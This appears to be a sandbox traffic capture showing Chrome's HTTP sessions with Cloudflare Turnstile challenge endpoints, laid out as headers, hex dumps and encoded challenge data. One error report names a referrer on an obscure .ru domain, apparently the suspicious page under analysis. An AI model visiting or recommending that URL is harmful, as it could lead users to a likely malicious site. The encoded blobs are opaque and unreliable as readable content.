                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:10 UTC426OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 37 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 68 36 6e 2e 78 73 77 70 62 73 6d 78 2e 72 75 2f 39 64 43 50 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 36 34 2e 31 36 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":479,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://h6n.xswpbsmx.ru/9dCP/","sampling_fraction":1.0,"server_ip":"172.67.164.164","status_code":404,"type":"http.error"},"type":"network-error","
                                                                                                                              2024-12-04 20:16:10 UTC168INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              date: Wed, 04 Dec 2024 20:16:10 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.449775104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:10 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:10 UTC379INHTTP/1.1 404 Not Found
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:10 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 7
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              cf-chl-out: 2yYIs35oY40WYv3Uo0TFGQqTZ2GV+3hLR5M=$ZcW4MlnW5I9eJaLx
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece79022e0541c3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:10 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                              Data Ascii: invalid


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.2.449776104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:10 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8ece78d77fea8c95/1733343368097/Zbvu0NF-cP9MNpr HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:11 UTC200INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:10 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece79048c164269-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:11 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 49 00 00 00 24 08 02 00 00 00 4a 7b 80 0f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRI$J{IDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.449777104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:12 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8ece78d77fea8c95/1733343368097/Zbvu0NF-cP9MNpr HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:13 UTC200INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:13 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece7911e90543ec-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:13 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 49 00 00 00 24 08 02 00 00 00 4a 7b 80 0f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRI$J{IDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.449781104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:12 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8ece78d77fea8c95/1733343368101/882d612e592359885fa563a9ad67aa19862c0cf04f8be5a8bd6e3205384a9319/89oKHm0hcVr6gQ_ HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: max-age=0
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:13 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:13 GMT
                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                              Content-Length: 1
                                                                                                                              Connection: close
                                                                                                                              2024-12-04 20:16:13 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 69 43 31 68 4c 6c 6b 6a 57 59 68 66 70 57 4f 70 72 57 65 71 47 59 59 73 44 50 42 50 69 2d 57 6f 76 57 34 79 42 54 68 4b 6b 78 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20giC1hLlkjWYhfpWOprWeqGYYsDPBPi-WovW4yBThKkxkAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                              2024-12-04 20:16:13 UTC1INData Raw: 4a
                                                                                                                              Data Ascii: J


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.449783104.18.94.414433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:16:14 UTC1175OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1622837158:1733341834:Dc9KQflSkPZkmMEtyak2vrZSKicoXy7NaQkbVZnHHyQ/8ece78d77fea8c95/vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 31708
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                              CF-Chl-RetryAttempt: 0
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              CF-Challenge: vYfNl33Oh6QHrtE.EMiOKVI5WsVZz.L4qQJn_Uj7HoA-1733343363-1.1.1.1-Vr3hLzRGqU62Jd1H5QGtItUYdGf_SlbwjkhOjzwmkcw7gVZlmEAg7_s.Fi.hyiaX
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/15pl4/0x4AAAAAAA0qpC5c45_RMlWM/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:16:14 UTC16384OUTData Raw: 76 5f 38 65 63 65 37 38 64 37 37 66 65 61 38 63 39 35 3d 25 32 62 35 45 68 41 2d 36 51 47 6a 74 59 35 59 75 2d 31 59 33 59 70 44 37 59 71 59 71 68 73 42 68 76 4b 79 36 53 59 74 49 71 71 45 70 4b 59 6c 6a 59 30 24 44 35 72 59 73 37 59 2b 24 37 4c 76 77 76 59 32 49 44 77 72 36 4e 2b 6d 59 72 59 6e 76 59 37 79 59 41 47 67 68 61 71 59 45 72 36 77 59 76 72 2d 6b 73 68 38 71 72 59 49 33 24 59 67 7a 6a 61 47 43 5a 44 64 66 59 43 67 7a 69 59 71 75 36 42 59 76 71 42 72 71 46 59 76 79 72 75 6c 59 36 5a 59 38 74 59 6a 68 59 32 35 68 2d 32 59 72 44 45 59 37 7a 4b 75 72 59 31 35 52 37 71 4c 51 6d 42 72 32 37 61 35 6d 45 35 51 42 73 63 75 68 59 73 35 4e 59 59 61 75 44 45 69 63 72 59 66 4e 4b 6d 63 6a 4e 62 55 74 78 44 67 4d 52 52 63 43 6a 65 41 51 65 53 36 4b 6d 36 66
                                                                                                                              Data Ascii: v_8ece78d77fea8c95=%2b5EhA-6QGjtY5Yu-1Y3YpD7YqYqhsBhvKy6SYtIqqEpKYljY0$D5rYs7Y+$7LvwvY2IDwr6N+mYrYnvY7yYAGghaqYEr6wYvr-ksh8qrYI3$YgzjaGCZDdfYCgziYqu6BYvqBrqFYvyrulY6ZY8tYjhY25h-2YrDEY7zKurY15R7qLQmBr27a5mE5QBscuhYs5NYYauDEicrYfNKmcjNbUtxDgMRRcCjeAQeS6Km6f
                                                                                                                              2024-12-04 20:16:14 UTC15324OUTData Raw: 63 65 5a 59 67 59 43 68 4d 35 4b 59 70 63 36 4f 36 34 46 6e 59 43 77 6b 42 37 68 36 33 55 6a 64 6d 59 59 4c 72 62 59 45 68 2d 47 59 70 35 2b 74 6a 6e 59 69 59 33 24 2d 71 68 55 59 44 47 2d 4b 59 78 39 6a 72 36 36 59 64 59 2d 24 43 62 59 34 59 6a 24 59 2d 59 72 68 43 47 61 63 59 62 68 59 47 2d 74 59 46 68 69 47 59 4f 59 2b 68 44 38 36 47 59 66 68 69 74 43 32 59 4b 59 33 74 59 68 59 45 72 59 68 2d 66 35 67 59 38 6d 43 38 6b 51 45 37 37 36 35 59 78 59 33 24 36 74 59 37 56 33 35 36 73 59 38 48 46 35 59 63 24 32 68 69 57 57 6b 2d 65 59 44 47 59 4b 24 73 59 36 49 59 78 72 43 59 44 68 59 4b 24 30 72 37 51 36 47 59 36 24 44 47 59 47 59 36 24 2d 47 43 4b 59 39 68 44 47 36 79 68 5a 24 6a 74 59 70 59 77 59 67 74 43 6e 59 38 32 6a 62 36 73 59 72 72 70 45 2d 7a 59 31
                                                                                                                              Data Ascii: ceZYgYChM5KYpc6O64FnYCwkB7h63UjdmYYLrbYEh-GYp5+tjnYiY3$-qhUYDG-KYx9jr66YdY-$CbY4Yj$Y-YrhCGacYbhYG-tYFhiGYOY+hD86GYfhitC2YKY3tYhYErYh-f5gY8mC8kQE7765YxY3$6tY7V356sY8HF5Yc$2hiWWk-eYDGYK$sY6IYxrCYDhYK$0r7Q6GY6$DGYGY6$-GCKY9hDG6yhZ$jtYpYwYgtCnY82jb6sYrrpE-zY1
                                                                                                                              2024-12-04 20:16:15 UTC330INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:16:15 GMT
                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                              Content-Length: 26312
                                                                                                                              Connection: close
                                                                                                                              cf-chl-gen: ZcyOxywc878E36G8i6UtIJ3Qk2TfgETnDZjTkX+XoLjwu+VteHbS8xyZuFxLEXwrK/uf1FHqA57uARkT$cLmpk6tH8wnNiu7G
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece791cc86fc34d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:16:15 UTC1039INData Raw: 65 37 65 33 70 6f 4f 7a 70 4b 44 4d 74 71 53 69 68 35 32 76 7a 72 32 31 79 4b 4f 76 73 39 69 6e 73 37 65 39 33 72 69 37 76 64 36 31 33 4f 57 78 35 75 48 41 33 72 54 45 31 39 79 39 37 38 4f 39 35 62 54 68 39 4d 44 41 38 38 6e 49 31 4c 54 4c 79 65 2f 62 33 4e 61 32 42 50 4c 39 42 50 58 46 43 4e 76 56 44 75 54 47 37 65 49 50 30 74 38 56 30 4e 58 75 30 76 48 76 38 74 73 53 36 68 51 59 2b 64 76 31 37 69 55 6f 2f 68 51 41 2f 43 62 39 49 67 49 4f 48 79 38 72 41 41 67 51 41 7a 44 34 47 6a 30 65 4c 78 49 78 47 67 41 61 41 2f 34 78 41 54 45 65 45 77 6c 4c 47 55 59 74 51 42 31 4f 4c 53 45 7a 4e 6b 63 79 51 6b 55 5a 57 31 73 39 4e 54 4e 54 4f 42 34 6a 57 53 56 57 57 53 6c 68 50 57 31 6b 61 6b 49 2f 4f 6d 56 46 55 48 49 70 4d 45 4e 50 52 58 46 33 66 57 31 58 64 31 74
                                                                                                                              Data Ascii: e7e3poOzpKDMtqSih52vzr21yKOvs9ins7e93ri7vd613OWx5uHA3rTE19y978O95bTh9MDA88nI1LTLye/b3Na2BPL9BPXFCNvVDuTG7eIP0t8V0NXu0vHv8tsS6hQY+dv17iUo/hQA/Cb9IgIOHy8rAAgQAzD4Gj0eLxIxGgAaA/4xATEeEwlLGUYtQB1OLSEzNkcyQkUZW1s9NTNTOB4jWSVWWSlhPW1kakI/OmVFUHIpMENPRXF3fW1Xd1t
                                                                                                                              2024-12-04 20:16:15 UTC1369INData Raw: 48 76 36 57 2f 78 62 36 51 78 39 57 37 7a 35 79 63 32 72 58 58 77 61 2b 64 34 64 36 6b 76 61 44 6d 73 36 65 6b 78 63 57 34 32 64 4c 73 72 37 54 68 39 4f 75 33 39 73 72 56 76 4c 54 51 79 4f 6f 41 76 50 51 42 32 50 58 77 35 65 6e 6c 34 4e 6e 4c 31 73 76 43 32 2b 63 4b 36 41 6f 4b 38 51 62 72 34 76 44 7a 44 51 2f 39 45 51 72 35 32 66 7a 7a 48 75 63 68 48 43 73 68 48 66 59 50 48 41 45 6a 36 66 49 6a 42 43 77 46 43 50 63 57 48 52 30 32 44 68 6f 52 45 69 51 68 49 52 55 63 43 42 6f 59 53 66 30 47 4b 79 55 78 4b 55 68 47 4c 52 38 55 49 7a 52 59 44 44 59 38 53 31 30 2b 45 69 6b 69 59 46 35 51 59 6c 41 30 58 44 4e 6c 53 32 73 36 50 30 74 67 4f 32 67 71 62 6b 74 72 62 33 56 76 4e 6a 68 74 54 58 31 75 62 44 78 52 63 30 39 68 68 34 4b 4b 64 48 6d 41 59 56 6c 67 68 5a
                                                                                                                              Data Ascii: Hv6W/xb6Qx9W7z5yc2rXXwa+d4d6kvaDms6ekxcW42dLsr7Th9Ou39srVvLTQyOoAvPQB2PXw5enl4NnL1svC2+cK6AoK8Qbr4vDzDQ/9EQr52fzzHuchHCshHfYPHAEj6fIjBCwFCPcWHR02DhoREiQhIRUcCBoYSf0GKyUxKUhGLR8UIzRYDDY8S10+EikiYF5QYlA0XDNlS2s6P0tgO2gqbktrb3VvNjhtTX1ubDxRc09hh4KKdHmAYVlghZ
                                                                                                                              2024-12-04 20:16:15 UTC1369INData Raw: 6f 4b 32 36 70 4a 4f 7a 71 63 36 30 74 36 2f 56 31 35 37 65 7a 39 6e 71 34 62 6a 58 76 63 6a 50 79 2b 62 6f 33 65 66 6a 76 71 6e 6f 37 65 4c 79 74 37 54 54 74 73 33 4a 30 2b 44 6b 75 38 4c 43 78 51 4c 30 2b 65 62 66 32 77 63 53 43 39 77 47 34 50 4c 72 44 67 54 70 39 66 41 4e 2f 42 76 79 2b 74 6f 52 34 42 6e 69 46 66 44 32 47 65 49 55 43 51 58 37 43 43 59 4e 37 68 4d 70 46 53 67 73 45 7a 6a 31 45 6a 59 39 2f 66 7a 37 4c 44 55 54 4f 41 42 45 41 68 38 59 48 78 59 45 53 69 45 73 44 45 38 2b 4d 41 73 2f 54 30 41 79 57 6c 68 57 55 6c 6f 61 58 45 41 68 48 7a 6f 35 4d 53 4a 69 4d 53 4e 68 5a 79 74 5a 52 6c 31 6a 50 57 6b 79 5a 54 46 77 59 57 6f 30 57 57 5a 63 52 6b 39 68 65 57 4e 77 56 6e 75 47 52 54 70 46 64 56 74 55 57 33 32 42 58 57 4a 76 54 6e 57 4b 59 58 42
                                                                                                                              Data Ascii: oK26pJOzqc60t6/V157ez9nq4bjXvcjPy+bo3efjvqno7eLyt7TTts3J0+Dku8LCxQL0+ebf2wcSC9wG4PLrDgTp9fAN/Bvy+toR4BniFfD2GeIUCQX7CCYN7hMpFSgsEzj1EjY9/fz7LDUTOABEAh8YHxYESiEsDE8+MAs/T0AyWlhWUloaXEAhHzo5MSJiMSNhZytZRl1jPWkyZTFwYWo0WWZcRk9heWNwVnuGRTpFdVtUW32BXWJvTnWKYXB
                                                                                                                              2024-12-04 20:16:15 UTC1369INData Raw: 4c 53 2b 7a 72 44 61 7a 65 48 6a 30 4e 61 31 35 73 54 47 34 72 76 51 75 4b 37 6b 33 66 58 6f 39 38 2f 6f 39 38 54 56 31 73 2f 50 33 63 6d 35 38 62 79 37 34 74 41 46 34 76 62 33 76 66 37 56 41 67 58 39 45 41 72 69 35 75 54 71 38 51 63 58 36 77 30 50 47 52 6f 65 36 43 50 39 41 78 51 64 45 52 33 31 4a 52 51 67 43 75 67 58 47 41 30 41 2f 53 73 4a 37 69 6f 34 4a 2f 51 4b 4f 42 50 32 39 54 51 4a 38 79 73 64 4e 68 45 48 52 68 55 45 4f 68 59 75 41 43 6b 78 54 42 38 54 4d 69 5a 4b 51 45 63 32 53 6c 63 37 56 31 41 57 46 6c 45 62 56 45 35 6a 4a 56 51 7a 59 32 74 6e 52 44 31 48 5a 55 68 49 55 46 74 75 53 55 56 4a 55 48 5a 4f 62 55 35 59 63 56 77 32 65 54 39 44 64 6e 56 76 50 32 5a 63 64 57 4a 4d 68 6f 5a 4c 67 33 6d 54 5a 48 79 45 59 70 52 76 56 70 64 70 57 56 71 4c
                                                                                                                              Data Ascii: LS+zrDazeHj0Na15sTG4rvQuK7k3fXo98/o98TV1s/P3cm58by74tAF4vb3vf7VAgX9EAri5uTq8QcX6w0PGRoe6CP9AxQdER31JRQgCugXGA0A/SsJ7io4J/QKOBP29TQJ8ysdNhEHRhUEOhYuACkxTB8TMiZKQEc2Slc7V1AWFlEbVE5jJVQzY2tnRD1HZUhIUFtuSUVJUHZObU5YcVw2eT9DdnVvP2ZcdWJMhoZLg3mTZHyEYpRvVpdpWVqL
                                                                                                                              2024-12-04 20:16:15 UTC1369INData Raw: 43 34 32 4c 76 54 34 75 6a 67 77 4e 6a 4e 38 4b 6e 77 71 61 2b 73 35 4d 4c 52 79 66 44 37 75 72 66 4a 76 66 44 30 2f 66 76 57 2f 67 49 41 77 51 45 44 42 50 67 42 36 38 66 73 35 74 4c 63 2f 4f 33 50 36 51 66 75 35 65 54 31 43 66 55 50 41 75 30 61 32 52 50 6c 45 77 6b 71 33 77 4d 62 4b 69 6e 6e 41 53 67 79 43 69 59 75 4d 54 51 31 43 52 6f 6f 42 42 49 63 45 52 48 36 49 66 6b 4d 4e 77 38 36 4e 6a 77 71 51 6b 77 75 53 7a 35 45 44 55 74 43 4a 46 42 48 50 30 35 51 56 55 6c 53 54 54 78 50 56 78 30 62 57 46 73 58 4f 31 6b 34 58 46 74 62 4f 31 56 4a 57 47 64 4c 55 31 30 77 54 32 4e 6f 62 46 4a 30 62 56 73 35 4f 6d 6c 33 56 32 35 79 65 45 45 34 63 48 31 4a 52 58 56 46 69 57 5a 2f 53 55 71 42 66 57 57 49 6c 49 64 6d 69 46 4f 4f 65 33 35 51 6b 4a 56 72 63 49 32 46 63
                                                                                                                              Data Ascii: C42LvT4ujgwNjN8Knwqa+s5MLRyfD7urfJvfD0/fvW/gIAwQEDBPgB68fs5tLc/O3P6Qfu5eT1CfUPAu0a2RPlEwkq3wMbKinnASgyCiYuMTQ1CRooBBIcERH6IfkMNw86NjwqQkwuSz5EDUtCJFBHP05QVUlSTTxPVx0bWFsXO1k4XFtbO1VJWGdLU10wT2NobFJ0bVs5Oml3V25yeEE4cH1JRXVFiWZ/SUqBfWWIlIdmiFOOe35QkJVrcI2Fc
                                                                                                                              2024-12-04 20:16:15 UTC1369INData Raw: 4b 34 73 2f 42 71 4b 7a 53 37 72 37 75 38 4f 44 67 73 66 66 4b 32 72 33 34 36 4e 6f 43 76 64 62 77 74 77 48 7a 30 73 41 48 79 51 54 48 42 73 6e 78 43 66 33 4d 30 42 55 41 35 65 34 50 43 50 72 55 48 51 6a 59 48 42 63 45 44 42 41 59 49 41 63 59 47 75 48 39 4b 53 30 71 4b 51 2f 77 48 68 33 74 4e 54 49 4c 44 43 67 32 2b 66 6b 39 2b 52 4d 62 41 44 38 35 4d 54 73 6f 4a 69 5a 46 4e 69 6f 4e 52 6b 55 4a 44 55 59 39 4d 7a 5a 4e 51 68 55 52 46 54 74 58 4a 31 64 5a 53 55 6b 61 59 44 4e 44 4a 6d 46 52 51 32 6f 6d 50 31 6b 67 61 56 77 37 4b 57 38 79 62 44 42 68 56 30 5a 7a 5a 6c 74 47 65 48 55 39 62 48 56 6b 59 6b 47 46 63 6d 64 57 68 58 61 42 59 34 6c 37 58 6d 52 71 69 31 4a 6a 54 35 4b 42 6d 46 4b 59 68 57 74 56 6d 5a 78 72 58 4b 43 64 64 4a 53 69 65 36 56 6e 6c 6d
                                                                                                                              Data Ascii: K4s/BqKzS7r7u8ODgsffK2r346NoCvdbwtwHz0sAHyQTHBsnxCf3M0BUA5e4PCPrUHQjYHBcEDBAYIAcYGuH9KS0qKQ/wHh3tNTILDCg2+fk9+RMbAD85MTsoJiZFNioNRkUJDUY9MzZNQhURFTtXJ1dZSUkaYDNDJmFRQ2omP1kgaVw7KW8ybDBhV0ZzZltGeHU9bHVkYkGFcmdWhXaBY4l7XmRqi1JjT5KBmFKYhWtVmZxrXKCddJSie6Vnlm
                                                                                                                              2024-12-04 20:16:15 UTC1369INData Raw: 72 4c 44 7a 31 2b 75 77 39 64 75 31 79 66 7a 66 38 37 77 44 36 2f 65 38 2b 65 37 37 78 50 37 30 32 51 77 4c 39 38 6e 6c 44 76 4d 49 41 42 45 41 39 64 41 57 42 4e 51 55 47 67 6e 5a 37 52 34 4d 38 53 51 6a 45 51 62 67 4b 42 4d 67 37 43 38 5a 44 69 77 71 48 42 49 57 4c 69 41 57 2b 44 67 6b 43 78 49 39 4b 41 38 4b 50 79 76 38 4d 44 34 6f 50 52 5a 47 4e 51 59 61 51 7a 6b 75 45 56 41 38 44 69 4a 50 51 45 77 56 57 30 55 72 4b 6c 5a 41 56 47 42 67 54 42 31 51 59 31 41 69 50 6d 68 56 4f 6d 68 6d 57 44 34 70 61 31 78 43 64 48 4a 68 4d 6b 4a 79 5a 48 41 31 65 32 68 65 65 48 64 73 65 49 53 48 63 56 5a 42 68 33 52 47 56 6f 5a 35 62 6e 79 50 65 30 35 71 6a 34 42 52 65 70 4f 44 6b 4a 79 61 67 4a 52 68 6c 6f 31 65 63 71 43 50 6e 4b 53 70 6c 58 74 32 70 35 64 71 68 71 75
                                                                                                                              Data Ascii: rLDz1+uw9du1yfzf87wD6/e8+e77xP702QwL98nlDvMIABEA9dAWBNQUGgnZ7R4M8SQjEQbgKBMg7C8ZDiwqHBIWLiAW+DgkCxI9KA8KPyv8MD4oPRZGNQYaQzkuEVA8DiJPQEwVW0UrKlZAVGBgTB1QY1AiPmhVOmhmWD4pa1xCdHJhMkJyZHA1e2heeHdseISHcVZBh3RGVoZ5bnyPe05qj4BRepODkJyagJRhlo1ecqCPnKSplXt2p5dqhqu
